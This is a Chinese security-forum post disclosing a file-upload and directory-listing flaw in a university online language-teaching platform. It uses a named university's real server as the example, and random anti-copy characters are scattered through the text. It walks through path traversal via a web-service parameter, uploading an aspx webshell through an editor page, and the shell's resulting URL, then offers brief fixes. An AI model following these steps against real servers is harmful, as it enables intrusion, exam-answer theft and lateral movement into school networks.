中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中0 S5 ~& Q* u8 H7 [1 W+ I* g

) j- F  S$ {: `, s3 ]( G详细说明:
* B) v/ ], t9 W6 j! V: ]# R 4 f- D/ }5 _8 ]4 j  L; m# J8 [' h% c
以南开大学的为例:
6 m4 F& x; Q# ~- Y; Uhttp://222.30.60.3/NPELS
9 I6 G, @; Z/ Q" t* l& UNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
6 I  A2 V2 W3 w: O5 T$ J( [<setting name="Update_CommonSvr_CommonService" serializeAs="String">
8 G! P' b! M! I, p; V; k<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
. S' ^' E4 O& h) r</setting>
- H8 c6 a6 u& g7 F- R) X及版本号
  Y: ]+ g6 S+ x<add key="TVersion" value="1, 0, 0, 2187">
( i, U! a# K- y9 _</add>' `: G0 j5 Z- A( |
直接访问  d2 A; s  Q/ z9 j8 z  F) ~
http://222.30.60.3/NPELS/CommonService.asmx
3 X4 ?$ t( _& {- X7 x! Z( p$ ^' ]使用GetTestClientFileList操作,直接 HTTP GET 列目录:
5 O3 L, c8 k+ ]* r4 ehttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187* F* O6 }- L& g- g, c$ y
进一步列目录(返回的网页很大,可以直接 wget 下来)
+ n9 M. M. _4 x' V' Y; e9 ]http://222.30.60.3/NPELS/CommonS ... List?version=../../
) y0 D2 U6 d0 v! r& A" D
9 `1 n  b9 p- F" m! H发现  x1 i: m$ e, I2 [4 z0 O1 V
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm" o, \0 d5 X8 F1 O0 z2 L. Q9 i1 Z
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头7 O$ O( a0 o/ o2 V) `2 i
上传后继续列目录找到木马地址直接访问即可
: C. k$ m4 I. u$ U
; ?( h; q# \% J2 ?OOXX' [3 y' A& k7 i+ R
4 c2 J7 O4 o: @0 V* L
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
) \' z4 |0 G& i6 C. ]1 t' R漏洞证明:# E5 L6 g( `% u
9 ~. e; d  k5 \# E
列目录:
# f! v, q" Y( E" H9 thttp://222.30.60.3/NPELS/CommonS ... List?version=../../7 X; |& H9 O6 F: d
文件上传:
) Z' o8 @$ R6 r- U* Lhttp://222.30.60.3/npelsv/editor/editor.htm
5 u3 O% W4 s. l
* @$ A6 b) X/ [( c/ P" K7 k0 r上传木马:. @3 P& c2 F9 b) [% P* j# @* ]
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx) c! M! [. F% F: y% c
0 _8 m9 O4 w1 A, I- B
修复方案:% I  j5 C# ^5 n3 o- l. m
好像考试系统必须使用 CommonService.asmx
9 w/ R3 R9 t3 s% J- h最好配置文件加密或者用别的方式不让它泄露出来4 n3 u! w0 ^( q0 E
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​7 x- {4 o+ W, W" k, D+ F% i





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2